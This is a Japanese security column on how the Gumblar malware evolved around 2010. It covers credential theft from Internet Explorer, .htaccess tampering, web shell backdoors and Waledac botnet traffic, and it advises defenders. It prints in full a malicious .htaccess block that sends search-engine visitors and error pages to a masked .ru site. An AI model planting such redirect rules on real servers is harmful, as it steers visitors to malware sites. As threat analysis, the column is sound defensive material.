皆さんこんにちは、川口です。いきなりですが、最近私も「つぶやき」を始めています。といっても、はやりのTwitterではなく、動画での「つぶやき」です。YouTubeの「laccotv」というチャンネルで1〜2分の短いテーマを毎週掲載しています。毎週掲載というプレッシャーの中、いつまでネタが続くか楽しみにしていてください。
今回のコラムは、そのつぶやきの中で取り上げることが多い、いわゆる「Gumblar」(もはやこの定義もかなりあいまいになっていますが)に関する「そのあと」の情報を説明します。
FTP“以外”のアカウント情報の盗用
2010年は大企業サイトの改ざん事件に関する報道もあり、Gumblarは一気に世間の注目を集めました。2010年1月から3月にかけては、どのお客さまへお伺いしても、Gumblarの話題を依頼されていました。セミナーや勉強会、個別説明を含めると、おそらく3カ月間で40回以上はGumblarについて話していた気がします。一時的にではありますが、日本で一番Gumblarについて話している男だったかもしれません。
そこでよく質問される内容は以下のものでした。
- 「FTPを使っていなければ安全なんですよね?」
- 「FTPの情報だけしか盗まないんですよね?」
Gumblarがはやり始めた当初は、「いま“は”そうですね。しかし、明日には変わっているかもしれませんよ」とお答えしていたのですが、現在ではFTPの情報以外にも、Internet Explorerに記憶させているアカウント情報を盗んでいくケースがあります。
Gumblarに感染すると、以下のような文字列を含むHTTPのPOST通信が発生します。
一見、何の情報なのかわかりませんが、これはBASE64でエンコードされています。デコードすると以下の内容が確認できます。
【注】
このデータはコラム用に作成したものですので、もちろん実際にログインを試すようなことはしないでください
「PS__::」に続く部分にIDとパスワードらしき情報が並んでいます。これはInternet Explorerのオートコンプリート機能で記憶させているアカウント情報です。Gumblarは感染したPCに格納されているアカウント情報を盗み、暗号化(BASE64を暗号化と呼ぶには語弊がありますが)して外部に送信しています。
ブラウザ以外でも、PCにアカウント情報を格納し、何らかの形でそのアカウント情報を使っていれば、技術的にはアカウント情報を盗むことが可能です。現在はGumblarがアカウントを盗む対象アプリケーションを利用していないからといって安心しないでください。万が一、Gumblarに感染した場合には、面倒でもシステムで使用しているパスワードをすべて変更するべきでしょう。
コンテンツファイル以外の改ざん
コンテンツ改ざんにも新しい方法が現れています。従来のGumblarはFTPサーバにログインし、既存のコンテンツに悪性サイトへの誘導リンクを挿入していました。しかし、既存のコンテンツを書き換えずに悪性サイトへ誘導する新しい手法が現れました。具体的には、Apacheの設定ファイルである「.htaccess」ファイルを改ざんすることで、既存のコンテンツに手を加えることなく、悪性サイトへの誘導を行います。
【関連記事】
注意喚起:Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認
http://www.lac.co.jp/info/alert/alert20100303.html
私たちが確認した不審な「.htaccess」ファイルは以下のようなものです。
# HostRule RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule ^(.*)$ http://********.ru/ [R=301,L] ErrorDocument 401 http://********.ru/ ErrorDocument 403 http://********.ru/ ErrorDocument 404 http://********.ru/ ErrorDocument 500 http://********.ru/ # /HostRule
ブラウザ内の「お気に入り」からのアクセスや、ほかのサイトからのリンクからのアクセスの場合には、正常なコンテンツが表示されます。しかし、検索エンジンからのアクセスや、存在しないファイルにアクセスした場合には、悪性サイトに自動的に誘導されます。特定条件下でのみ誘導が行われるため、リモートからのホームページ改ざんチェック機能では発見できない可能性がありますので、現在、リモートからチェックされている人はご注意ください。
バックドアの設置
Gumblarおよび攻撃者は、FTPサーバにログインしたあとに悪性サイトへ誘導するために、既存コンテンツや「.htaccess」ファイルを改ざんする以外にも、ウェブ経由でサーバを操作することができるバックドアを設置するケースがありました。ウェブ経由でサーバの操作を可能とするバックドアは「ウェブシェル」(WebShell)とも呼ばれます。簡単なHTTPリクエストを送信することで操作することができるものや、ブラウザから操作が可能な多機能なものまで多数存在します。
バックドアを設置された場合、ログインに利用されたFTPサーバのパスワードを変更しても、サーバの操作が可能です。被害を受けたサーバの調査が不十分であったためバックドアが残されており、再度改ざんを受けるケースもありますので、被害を受けたサーバの調査は徹底的に実施しましょう。
当然の話ですが、「.htaccess」ファイルの改ざんの話もバックドアの話も、そもそもサーバに不正にログインさせなければ、このような問題におびえることはありません。FTPサーバのアクセス制御とアカウント情報の漏えいに対する対処はもちろんのことですが、SQLインジェクションやそのほかの脆弱性を狙った攻撃も、これらと同様に対応してください。
Gumblarの通信形態の変化
Gumblarに感染したPCはHTTPでのPtoPネットワークを形成します。これは、川口洋のつぶやき第2回目でも説明しています。
【関連記事】
「Gumblar とConfickerにつながるWaledac」
〜川口洋のつぶやき 第2回 03/05/2010
http://www.youtube.com/watch?v=tBATrIVY0Rg
Gumblarに感染した端末は、このPtoPネットワークを経由してC&Cサーバ(指令用のサーバ)との命令を送受信します。このHTTP通信に現れるサーバは常に新しいノード情報へとアップデートされており、特定が困難です。またHTTPのURLもランダムに生成されており、一見すると通常のウェブアクセスで発生するHTTP通信と見間違えてしまうほどです。このようなボットのグループを通称「Waledac」といいます。このWaledacは2009年から問題になっているConfickerの亜種にも利用されていました。
「GumblarとConfickerが融合すると面倒なことになりそうだ」と恐れていたのですが、よいニュースがありました。マイクロソフトがWaledacの感染PCからC&Cサーバへの通信を遮断する設定を行いました。
【関連記事】
Microsoftがボットネット対抗作戦、Waledacの通信断ち切る
http://www.itmedia.co.jp/enterprise/articles/1002/26/news029.html
Cracking Down on Botnets
http://blogs.technet.com/microsoft_blog/archive/2010/02/25/cracking-down-on-botnets.aspx
JSOCで観測している環境でも、ある時期を境にWaledacの活動は大幅に減少しました。今回の一連の作業に掛かるマイクロソフトのコストは多大なものであったと想定できますが、このような活動は(誰が予算を出すかが問題ですが)続けてほしいものです。
ホームページ改ざんにつながるGumblar被害の報道の温度は下がってきましたが、私たちの関心が薄くなっている間も、Gumblarは常に進化しています。今回紹介したもの以外に、HTTPSサービスに攻撃をさせるようなタイプのボットや、SNSを使って感染を広げるボットが埋め込まれるケースも発生しています。もはやGumblarは当初の言葉の定義には収まりきらないインシデントとなっています。
私たちは一時的なGumblarに限った対策ではなく、Gumblarを含む広義のウイルス(マルウェア)の対策を行わなければなりません。今後もさまざまなウイルスやインシデントについての情報発信をこのコラム「川口洋のセキュリティ・プライベート・アイズ」と「川口洋のつぶやき K's Private Talk」でお届けしていきます。私は新たなテーマを探すため、今夜も飲みにいくのでした。
Profile
川口 洋(かわぐち ひろし)
株式会社ラック
JSOCチーフエバンジェリスト兼セキュリティアナリスト
CISSP
ラック入社後、IDSやファイアウォールなどの運用・管理業務をへて、セキュリティアナリストとして、JSOC監視サービスに従事し、日々セキュリティインシデントに対応。
アナリストリーダとして、セキュリティイベントの分析とともに、IDS/IPSに適用するJSOCオリジナルシグネチャ(JSIG)の作成、チューニングを実施し、監視サービスの技術面のコントロールを行う。
現在、JSOCチーフエバンジェリスト兼セキュリティアナリストとして、JSOC全体の技術面をコントロールし、監視報告会、セミナー講師など対外的な活動も行う。
- 「DNS通信」記録していますか?――万一に備えたDNSクエリログの保存方法
- Web広告からのマルウエア感染「Malvertising」にどう対処すべきか
- 中の人が振り返る「Hardening 10 ValueChain」――学びにつながった「トラブルの数々」とは
- 無慈悲な専門家チーム「kuromame6」の暗躍に負けず勝利をつかんだチームは?
- 外部リソースの活用もポイントに、「Hardening 10 MarketPlace」開催
- Hardening Projectから派生した「MINI Hardening Project」に行ってみた!
- 「これさえしておけば助かったのに……」を避けるため、今すぐ確認すべき7項目
- アップデート機能を悪用した攻撃に対抗セヨ!
- 工夫、工夫そして工夫――Hardening 10 APAC“運営”レポート
- ウイルスとは言い切れない“悪意のあるソフトウェア”
- 2013年のセキュリティインシデントを振り返る
- ここが変だよ、そのWeb改ざん対応
- きっかけは不正侵入――私がセキュリティ業界に足を踏み入れたワケ
- CMSが狙われる3つの理由
- FacebookやApple、MSまで……Javaの脆弱性を狙う攻撃の手口
- Hardening One、8時間に渡る戦いの結果は?
- そのときStarBEDが動いた――「Hardening One」の夜明け前
- ロシアでわしも考えた
- 実録、「Hardening Zero」の舞台裏
- ちょっと変わったSQLインジェクション
- 官民連携の情報共有を真面目に考える
- アプリケーションサーバの脆弱性にご注意を
- IPv6、6つの悩み事
- スパムが吹けば薬局がもうかる
- JSOCに飛び込んできた不審なメール――これが標的型攻撃の実態だ
- 東日本大震災、そのときJSOCは
- ペニーオークションのセキュリティを斬る
- 2010年、5つの思い出――Gumblarからキャンプまで
- 9・18事件にみる7つの誤解
- 曇りのち晴れとなるか? クラウド環境のセキュリティ
- Webを見るだけで――ここまできたiPhoneの脅威
- 不安が残る、アドビの「脆弱性直しました」
- ともだち373人できるかな――インターネットメッセンジャーセキュリティ定点観測
- 実録・4大データベースへの直接攻撃
- Gumblar、いま注目すべきは名前ではなく“事象”
- Gumblarがあぶり出す 「空虚なセキュリティ対策」
- 新春早々の「Gumblar一問一答」
- 実はBlasterやNetsky並み?静かにはびこる“Gumblar”
- ECサイトソフトウェアはなぜ更新されないのか
- 狙われるphpMyAdmin、攻撃のきっかけは?
- 学生の未来に期待する夏
- 米韓へのDoS攻撃に見る、検知と防御の考え方
- 分かっちゃいるけど難しい、アカウント情報盗用ボット対策
- 狙われる甘〜いTomcat
- 表裏一体、あっちのリアルとこっちのサイバー
- 世間の認識と脅威レベルのギャップ――XSSは本当に危ないか?
- 急増したSQLインジェクション、McColo遮断の影響は
- ○×表の真実:「検知できる」ってどういうこと?
- ところで、パッケージアプリのセキュリティは?
- レッツ、登壇――アウトプットのひとつのかたち
Copyright © ITmedia, Inc. All Rights Reserved.